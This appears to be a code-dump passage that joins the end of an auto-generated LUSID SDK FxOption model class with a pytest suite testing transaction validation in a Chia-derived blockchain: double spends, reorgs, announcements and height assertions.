The maturity date of the option. # noqa: E501
:return: The option_maturity_date of this FxOption. # noqa: E501
:rtype: datetime
"""
return self._option_maturity_date
@option_maturity_date.setter
def option_maturity_date(self, option_maturity_date):
"""Sets the option_maturity_date of this FxOption.
The maturity date of the option. # noqa: E501
:param option_maturity_date: The option_maturity_date of this FxOption. # noqa: E501
:type option_maturity_date: datetime
"""
if self.local_vars_configuration.client_side_validation and option_maturity_date is None: # noqa: E501
raise ValueError("Invalid value for `option_maturity_date`, must not be `None`") # noqa: E501
self._option_maturity_date = option_maturity_date
@property
def option_settlement_date(self):
"""Gets the option_settlement_date of this FxOption. # noqa: E501
The settlement date of the option. # noqa: E501
:return: The option_settlement_date of this FxOption. # noqa: E501
:rtype: datetime
"""
return self._option_settlement_date
@option_settlement_date.setter
def option_settlement_date(self, option_settlement_date):
"""Sets the option_settlement_date of this FxOption.
The settlement date of the option. # noqa: E501
:param option_settlement_date: The option_settlement_date of this FxOption. # noqa: E501
:type option_settlement_date: datetime
"""
if self.local_vars_configuration.client_side_validation and option_settlement_date is None: # noqa: E501
raise ValueError("Invalid value for `option_settlement_date`, must not be `None`") # noqa: E501
self._option_settlement_date = option_settlement_date
@property
def payout_style(self):
"""Gets the payout_style of this FxOption. # noqa: E501
PayoutStyle for touch options. For options without touch optionality, payoutStyle should not be set. For options with touch optionality (where the touches data has been set), payoutStyle must be defined and cannot be None. Supported string (enumeration) values are: [Deferred, Immediate]. # noqa: E501
:return: The payout_style of this FxOption. # noqa: E501
:rtype: str
"""
return self._payout_style
@payout_style.setter
def payout_style(self, payout_style):
"""Sets the payout_style of this FxOption.
PayoutStyle for touch options. For options without touch optionality, payoutStyle should not be set. For options with touch optionality (where the touches data has been set), payoutStyle must be defined and cannot be None. Supported string (enumeration) values are: [Deferred, Immediate]. # noqa: E501
:param payout_style: The payout_style of this FxOption. # noqa: E501
:type payout_style: str
"""
self._payout_style = payout_style
@property
def premium(self):
"""Gets the premium of this FxOption. # noqa: E501
:return: The premium of this FxOption. # noqa: E501
:rtype: lusid.Premium
"""
return self._premium
@premium.setter
def premium(self, premium):
"""Sets the premium of this FxOption.
:param premium: The premium of this FxOption. # noqa: E501
:type premium: lusid.Premium
"""
self._premium = premium
@property
def touches(self):
"""Gets the touches of this FxOption. # noqa: E501
For a touch option the list should not be empty. Up to two touches are supported. An option cannot be at the same time barrier- and touch-option. One (or both) of the lists must be empty. # noqa: E501
:return: The touches of this FxOption. # noqa: E501
:rtype: list[lusid.Touch]
"""
return self._touches
@touches.setter
def touches(self, touches):
"""Sets the touches of this FxOption.
For a touch option the list should not be empty. Up to two touches are supported. An option cannot be at the same time barrier- and touch-option. One (or both) of the lists must be empty. # noqa: E501
:param touches: The touches of this FxOption. # noqa: E501
:type touches: list[lusid.Touch]
"""
self._touches = touches
@property
def instrument_type(self):
"""Gets the instrument_type of this FxOption. # noqa: E501
The available values are: QuotedSecurity, InterestRateSwap, FxForward, Future, ExoticInstrument, FxOption, CreditDefaultSwap, InterestRateSwaption, Bond, EquityOption, FixedLeg, FloatingLeg, BespokeCashFlowsLeg, Unknown, TermDeposit, ContractForDifference, EquitySwap, CashPerpetual, CapFloor, CashSettled, CdsIndex, Basket, FundingLeg, FxSwap, ForwardRateAgreement, SimpleInstrument, Repo, Equity, ExchangeTradedOption, ReferenceInstrument, ComplexBond, InflationLinkedBond, InflationSwap, SimpleCashFlowLoan # noqa: E501
:return: The instrument_type of this FxOption. # noqa: E501
:rtype: str
"""
return self._instrument_type
@instrument_type.setter
def instrument_type(self, instrument_type):
"""Sets the instrument_type of this FxOption.
The available values are: QuotedSecurity, InterestRateSwap, FxForward, Future, ExoticInstrument, FxOption, CreditDefaultSwap, InterestRateSwaption, Bond, EquityOption, FixedLeg, FloatingLeg, BespokeCashFlowsLeg, Unknown, TermDeposit, ContractForDifference, EquitySwap, CashPerpetual, CapFloor, CashSettled, CdsIndex, Basket, FundingLeg, FxSwap, ForwardRateAgreement, SimpleInstrument, Repo, Equity, ExchangeTradedOption, ReferenceInstrument, ComplexBond, InflationLinkedBond, InflationSwap, SimpleCashFlowLoan # noqa: E501
:param instrument_type: The instrument_type of this FxOption. # noqa: E501
:type instrument_type: str
"""
if self.local_vars_configuration.client_side_validation and instrument_type is None: # noqa: E501
raise ValueError("Invalid value for `instrument_type`, must not be `None`") # noqa: E501
allowed_values = ["QuotedSecurity", "InterestRateSwap", "FxForward", "Future", "ExoticInstrument", "FxOption", "CreditDefaultSwap", "InterestRateSwaption", "Bond", "EquityOption", "FixedLeg", "FloatingLeg", "BespokeCashFlowsLeg", "Unknown", "TermDeposit", "ContractForDifference", "EquitySwap", "CashPerpetual", "CapFloor", "CashSettled", "CdsIndex", "Basket", "FundingLeg", "FxSwap", "ForwardRateAgreement", "SimpleInstrument", "Repo", "Equity", "ExchangeTradedOption", "ReferenceInstrument", "ComplexBond", "InflationLinkedBond", "InflationSwap", "SimpleCashFlowLoan"] # noqa: E501
if self.local_vars_configuration.client_side_validation and instrument_type not in allowed_values: # noqa: E501
raise ValueError(
"Invalid value for `instrument_type` ({0}), must be one of {1}" # noqa: E501
.format(instrument_type, allowed_values)
)
self._instrument_type = instrument_type
def to_dict(self, serialize=False):
"""Returns the model properties as a dict"""
result = {}
def convert(x):
if hasattr(x, "to_dict"):
args = getfullargspec(x.to_dict).args
if len(args) == 1:
return x.to_dict()
else:
return x.to_dict(serialize)
else:
return x
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
attr = self.attribute_map.get(attr, attr) if serialize else attr
if isinstance(value, list):
result[attr] = list(map(
lambda x: convert(x),
value
))
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], convert(item[1])),
value.items()
))
else:
result[attr] = convert(value)
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, FxOption):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, FxOption):
return True
return self.to_dict() != other.to_dict()
| [
"[email protected]"
] | |
612a1943b2e44d5c298c6f1cc9756958d649bcfc | 3fa6edd22b4c826431d2b55d1aced446bf2755ac | /tests/blockchain/test_blockchain_transactions.py | 24838b3476029cfdc5243ac3ac25c6cbd7291240 | [
"Apache-2.0"
] | permissive | luzofex/plottingid-blockchain-1 | f3bca87316e93466b7512039f2c588a9baadd4a7 | d8a6bdfeb4474b4075e89c129853a606f55dd778 | refs/heads/main | 2023-06-11T12:32:36.690472 | 2021-07-06T19:23:19 | 2021-07-06T19:23:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 40,394 | py | import asyncio
import logging
import pytest
from clvm.casts import int_to_bytes
from plottingid.consensus.blockchain import ReceiveBlockResult
from plottingid.protocols import full_node_protocol
from plottingid.types.announcement import Announcement
from plottingid.types.condition_opcodes import ConditionOpcode
from plottingid.types.condition_with_args import ConditionWithArgs
from plottingid.types.spend_bundle import SpendBundle
from plottingid.util.errors import ConsensusError, Err
from plottingid.util.ints import uint64
from plottingid.util.wallet_tools import WalletTool
from tests.core.full_node.test_full_node import connect_and_get_peer
from tests.setup_nodes import bt, setup_two_nodes, test_constants
from tests.util.generator_tools_testing import run_and_get_removals_and_additions
BURN_PUZZLE_HASH = b"0" * 32
WALLET_A = WalletTool(test_constants)
WALLET_A_PUZZLE_HASHES = [WALLET_A.get_new_puzzlehash() for _ in range(5)]
log = logging.getLogger(__name__)
@pytest.fixture(scope="session")
def event_loop():
loop = asyncio.get_event_loop()
yield loop
class TestBlockchainTransactions:
@pytest.fixture(scope="function")
async def two_nodes(self):
async for _ in setup_two_nodes(test_constants):
yield _
@pytest.mark.asyncio
async def test_basic_blockchain_tx(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
peer = await connect_and_get_peer(server_1, server_2)
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block), None)
spend_block = blocks[2]
spend_coin = None
for coin in list(spend_block.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin = coin
spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_puzzlehash, spend_coin)
assert spend_bundle is not None
tx: full_node_protocol.RespondTransaction = full_node_protocol.RespondTransaction(spend_bundle)
await full_node_api_1.respond_transaction(tx, peer)
sb = full_node_1.mempool_manager.get_spendbundle(spend_bundle.name())
assert sb is spend_bundle
last_block = blocks[-1]
next_spendbundle, additions, removals = await full_node_1.mempool_manager.create_bundle_from_mempool(
last_block.header_hash
)
assert next_spendbundle is not None
new_blocks = bt.get_consecutive_blocks(
1,
block_list_input=blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=next_spendbundle,
guarantee_transaction_block=True,
)
next_block = new_blocks[-1]
await full_node_1.respond_block(full_node_protocol.RespondBlock(next_block))
assert next_block.header_hash == full_node_1.blockchain.get_peak().header_hash
added_coins = next_spendbundle.additions()
# Two coins are added, main spend and change
assert len(added_coins) == 2
for coin in added_coins:
unspent = await full_node_1.coin_store.get_coin_record(coin.name())
assert unspent is not None
assert not unspent.spent
assert not unspent.coinbase
@pytest.mark.asyncio
async def test_validate_blockchain_with_double_spend(self, two_nodes):
num_blocks = 5
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_3, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
spend_block = blocks[2]
spend_coin = None
for coin in list(spend_block.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin = coin
spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_puzzlehash, spend_coin)
spend_bundle_double = wallet_a.generate_signed_transaction(1001, receiver_puzzlehash, spend_coin)
block_spendbundle = SpendBundle.aggregate([spend_bundle, spend_bundle_double])
new_blocks = bt.get_consecutive_blocks(
1,
block_list_input=blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block_spendbundle,
guarantee_transaction_block=True,
)
next_block = new_blocks[-1]
res, err, _ = await full_node_1.blockchain.receive_block(next_block)
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.DOUBLE_SPEND
@pytest.mark.asyncio
async def test_validate_blockchain_duplicate_output(self, two_nodes):
num_blocks = 3
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
spend_block = blocks[2]
spend_coin = None
for coin in list(spend_block.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin = coin
spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_puzzlehash, spend_coin)
spend_bundle_double = wallet_a.generate_signed_transaction(1000, receiver_puzzlehash, spend_coin)
block_spendbundle = SpendBundle.aggregate([spend_bundle, spend_bundle_double])
new_blocks = bt.get_consecutive_blocks(
1,
block_list_input=blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block_spendbundle,
guarantee_transaction_block=True,
)
next_block = new_blocks[-1]
res, err, _ = await full_node_1.blockchain.receive_block(next_block)
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.DUPLICATE_OUTPUT
@pytest.mark.asyncio
async def test_validate_blockchain_with_reorg_double_spend(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
spend_block = blocks[2]
spend_coin = None
for coin in list(spend_block.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin = coin
spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_puzzlehash, spend_coin)
blocks_spend = bt.get_consecutive_blocks(
1,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
transaction_data=spend_bundle,
)
# Move chain to height 10, with a spend at height 10
for block in blocks_spend:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Reorg at height 5, add up to and including height 12
new_blocks = bt.get_consecutive_blocks(
7,
blocks[:6],
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
seed=b"another seed",
)
for block in new_blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Spend the same coin in the new reorg chain at height 13
new_blocks = bt.get_consecutive_blocks(
1,
new_blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
transaction_data=spend_bundle,
)
res, err, _ = await full_node_api_1.full_node.blockchain.receive_block(new_blocks[-1])
assert err is None
assert res == ReceiveBlockResult.NEW_PEAK
# But can't spend it twice
new_blocks_double = bt.get_consecutive_blocks(
1,
new_blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
transaction_data=spend_bundle,
)
res, err, _ = await full_node_api_1.full_node.blockchain.receive_block(new_blocks_double[-1])
assert err is Err.DOUBLE_SPEND
assert res == ReceiveBlockResult.INVALID_BLOCK
# Now test Reorg at block 5, same spend at block height 12
new_blocks_reorg = bt.get_consecutive_blocks(
1,
new_blocks[:12],
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
transaction_data=spend_bundle,
seed=b"spend at 12 is ok",
)
for block in new_blocks_reorg:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Spend at height 13 is also OK (same height)
new_blocks_reorg = bt.get_consecutive_blocks(
1,
new_blocks[:13],
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
transaction_data=spend_bundle,
seed=b"spend at 13 is ok",
)
for block in new_blocks_reorg:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Spend at height 14 is not OK (already spend)
new_blocks_reorg = bt.get_consecutive_blocks(
1,
new_blocks[:14],
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
transaction_data=spend_bundle,
seed=b"spend at 14 is double spend",
)
with pytest.raises(ConsensusError):
for block in new_blocks_reorg:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
@pytest.mark.asyncio
async def test_validate_blockchain_spend_reorg_coin(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_1_puzzlehash = WALLET_A_PUZZLE_HASHES[1]
receiver_2_puzzlehash = WALLET_A_PUZZLE_HASHES[2]
receiver_3_puzzlehash = WALLET_A_PUZZLE_HASHES[3]
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
spend_block = blocks[2]
spend_coin = None
for coin in list(spend_block.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin = coin
spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_1_puzzlehash, spend_coin)
new_blocks = bt.get_consecutive_blocks(
1,
blocks[:5],
seed=b"spend_reorg_coin",
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=spend_bundle,
guarantee_transaction_block=True,
)
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(new_blocks[-1]))
coin_2 = None
for coin in run_and_get_removals_and_additions(new_blocks[-1], test_constants.MAX_BLOCK_COST_CLVM)[1]:
if coin.puzzle_hash == receiver_1_puzzlehash:
coin_2 = coin
break
assert coin_2 is not None
spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_2_puzzlehash, coin_2)
new_blocks = bt.get_consecutive_blocks(
1,
new_blocks[:6],
seed=b"spend_reorg_coin",
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=spend_bundle,
guarantee_transaction_block=True,
)
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(new_blocks[-1]))
coin_3 = None
for coin in run_and_get_removals_and_additions(new_blocks[-1], test_constants.MAX_BLOCK_COST_CLVM)[1]:
if coin.puzzle_hash == receiver_2_puzzlehash:
coin_3 = coin
break
assert coin_3 is not None
spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_3_puzzlehash, coin_3)
new_blocks = bt.get_consecutive_blocks(
1,
new_blocks[:7],
seed=b"spend_reorg_coin",
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=spend_bundle,
guarantee_transaction_block=True,
)
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(new_blocks[-1]))
@pytest.mark.asyncio
async def test_validate_blockchain_spend_reorg_cb_coin(self, two_nodes):
num_blocks = 15
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_1_puzzlehash = WALLET_A_PUZZLE_HASHES[1]
blocks = bt.get_consecutive_blocks(num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Spends a coinbase created in reorg
new_blocks = bt.get_consecutive_blocks(
5,
blocks[:6],
seed=b"reorg cb coin",
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
)
for block in new_blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
spend_block = new_blocks[-1]
spend_coin = None
for coin in list(spend_block.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin = coin
spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_1_puzzlehash, spend_coin)
new_blocks = bt.get_consecutive_blocks(
1,
new_blocks,
seed=b"reorg cb coin",
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=spend_bundle,
guarantee_transaction_block=True,
)
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(new_blocks[-1]))
@pytest.mark.asyncio
async def test_validate_blockchain_spend_reorg_since_genesis(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_1_puzzlehash = WALLET_A_PUZZLE_HASHES[1]
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
spend_block = blocks[-1]
spend_coin = None
for coin in list(spend_block.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin = coin
spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_1_puzzlehash, spend_coin)
new_blocks = bt.get_consecutive_blocks(
1, blocks, seed=b"", farmer_reward_puzzle_hash=coinbase_puzzlehash, transaction_data=spend_bundle
)
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(new_blocks[-1]))
# Spends a coin in a genesis reorg, that was already spent
new_blocks = bt.get_consecutive_blocks(
12,
[],
seed=b"reorg since genesis",
farmer_reward_puzzle_hash=coinbase_puzzlehash,
guarantee_transaction_block=True,
)
for block in new_blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
new_blocks = bt.get_consecutive_blocks(
1,
new_blocks,
seed=b"reorg since genesis",
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=spend_bundle,
)
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(new_blocks[-1]))
@pytest.mark.asyncio
async def test_assert_my_coin_id(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
# Farm blocks
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Coinbase that gets spent
spend_block = blocks[2]
bad_block = blocks[3]
spend_coin = None
bad_spend_coin = None
for coin in list(spend_block.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin = coin
for coin in list(bad_block.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
bad_spend_coin = coin
valid_cvp = ConditionWithArgs(ConditionOpcode.ASSERT_MY_COIN_ID, [spend_coin.name()])
valid_dic = {valid_cvp.opcode: [valid_cvp]}
bad_cvp = ConditionWithArgs(ConditionOpcode.ASSERT_MY_COIN_ID, [bad_spend_coin.name()])
bad_dic = {bad_cvp.opcode: [bad_cvp]}
bad_spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_puzzlehash, spend_coin, bad_dic)
valid_spend_bundle = wallet_a.generate_signed_transaction(1000, receiver_puzzlehash, spend_coin, valid_dic)
assert bad_spend_bundle is not None
assert valid_spend_bundle is not None
# Invalid block bundle
# Create another block that includes our transaction
invalid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=bad_spend_bundle,
guarantee_transaction_block=True,
)
# Try to validate that block
res, err, _ = await full_node_1.blockchain.receive_block(invalid_new_blocks[-1])
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.ASSERT_MY_COIN_ID_FAILED
# Valid block bundle
# Create another block that includes our transaction
new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=valid_spend_bundle,
guarantee_transaction_block=True,
)
res, err, _ = await full_node_1.blockchain.receive_block(new_blocks[-1])
assert res == ReceiveBlockResult.NEW_PEAK
assert err is None
@pytest.mark.asyncio
async def test_assert_coin_announcement_consumed(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
# Farm blocks
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Coinbase that gets spent
block1 = blocks[2]
block2 = blocks[3]
spend_coin_block_1 = None
spend_coin_block_2 = None
for coin in list(block1.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin_block_1 = coin
for coin in list(block2.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin_block_2 = coin
# This condition requires block2 coinbase to be spent
block1_cvp = ConditionWithArgs(
ConditionOpcode.ASSERT_COIN_ANNOUNCEMENT,
[Announcement(spend_coin_block_2.name(), b"test").name()],
)
block1_dic = {block1_cvp.opcode: [block1_cvp]}
block1_spend_bundle = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_1, block1_dic
)
# This condition requires block1 coinbase to be spent
block2_cvp = ConditionWithArgs(
ConditionOpcode.CREATE_COIN_ANNOUNCEMENT,
[b"test"],
)
block2_dic = {block2_cvp.opcode: [block2_cvp]}
block2_spend_bundle = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_2, block2_dic
)
# Invalid block bundle
assert block1_spend_bundle is not None
# Create another block that includes our transaction
invalid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
guarantee_transaction_block=True,
)
# Try to validate that block
res, err, _ = await full_node_1.blockchain.receive_block(invalid_new_blocks[-1])
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.ASSERT_ANNOUNCE_CONSUMED_FAILED
# bundle_together contains both transactions
bundle_together = SpendBundle.aggregate([block1_spend_bundle, block2_spend_bundle])
# Create another block that includes our transaction
new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=bundle_together,
guarantee_transaction_block=True,
)
# Try to validate newly created block
res, err, _ = await full_node_1.blockchain.receive_block(new_blocks[-1])
assert res == ReceiveBlockResult.NEW_PEAK
assert err is None
@pytest.mark.asyncio
async def test_assert_puzzle_announcement_consumed(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
# Farm blocks
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Coinbase that gets spent
block1 = blocks[2]
block2 = blocks[3]
spend_coin_block_1 = None
spend_coin_block_2 = None
for coin in list(block1.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin_block_1 = coin
for coin in list(block2.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin_block_2 = coin
# This condition requires block2 coinbase to be spent
block1_cvp = ConditionWithArgs(
ConditionOpcode.ASSERT_PUZZLE_ANNOUNCEMENT,
[Announcement(spend_coin_block_2.puzzle_hash, b"test").name()],
)
block1_dic = {block1_cvp.opcode: [block1_cvp]}
block1_spend_bundle = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_1, block1_dic
)
# This condition requires block1 coinbase to be spent
block2_cvp = ConditionWithArgs(
ConditionOpcode.CREATE_PUZZLE_ANNOUNCEMENT,
[b"test"],
)
block2_dic = {block2_cvp.opcode: [block2_cvp]}
block2_spend_bundle = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_2, block2_dic
)
# Invalid block bundle
assert block1_spend_bundle is not None
# Create another block that includes our transaction
invalid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
guarantee_transaction_block=True,
)
# Try to validate that block
res, err, _ = await full_node_1.blockchain.receive_block(invalid_new_blocks[-1])
assert res == ReceiveBlockResult.INVALID_BLOCK
assert err == Err.ASSERT_ANNOUNCE_CONSUMED_FAILED
# bundle_together contains both transactions
bundle_together = SpendBundle.aggregate([block1_spend_bundle, block2_spend_bundle])
# Create another block that includes our transaction
new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=bundle_together,
guarantee_transaction_block=True,
)
# Try to validate newly created block
res, err, _ = await full_node_1.blockchain.receive_block(new_blocks[-1])
assert res == ReceiveBlockResult.NEW_PEAK
assert err is None
@pytest.mark.asyncio
async def test_assert_height_absolute(self, two_nodes):
num_blocks = 10
wallet_a = WALLET_A
coinbase_puzzlehash = WALLET_A_PUZZLE_HASHES[0]
receiver_puzzlehash = BURN_PUZZLE_HASH
# Farm blocks
blocks = bt.get_consecutive_blocks(
num_blocks, farmer_reward_puzzle_hash=coinbase_puzzlehash, guarantee_transaction_block=True
)
full_node_api_1, full_node_api_2, server_1, server_2 = two_nodes
full_node_1 = full_node_api_1.full_node
for block in blocks:
await full_node_api_1.full_node.respond_block(full_node_protocol.RespondBlock(block))
# Coinbase that gets spent
block1 = blocks[2]
spend_coin_block_1 = None
for coin in list(block1.get_included_reward_coins()):
if coin.puzzle_hash == coinbase_puzzlehash:
spend_coin_block_1 = coin
# This condition requires block1 coinbase to be spent after index 10
block1_cvp = ConditionWithArgs(ConditionOpcode.ASSERT_HEIGHT_ABSOLUTE, [int_to_bytes(10)])
block1_dic = {block1_cvp.opcode: [block1_cvp]}
block1_spend_bundle = wallet_a.generate_signed_transaction(
1000, receiver_puzzlehash, spend_coin_block_1, block1_dic
)
# program that will be sent too early
assert block1_spend_bundle is not None
invalid_new_blocks = bt.get_consecutive_blocks(
1,
blocks,
farmer_reward_puzzle_hash=coinbase_puzzlehash,
transaction_data=block1_spend_bundle,
guarantee_transaction_block=True,
)
# Try to validate that block at index 10
res, err, _ = await full_node_1.blockchain.receive_block(invalid_new_blocks[-1])
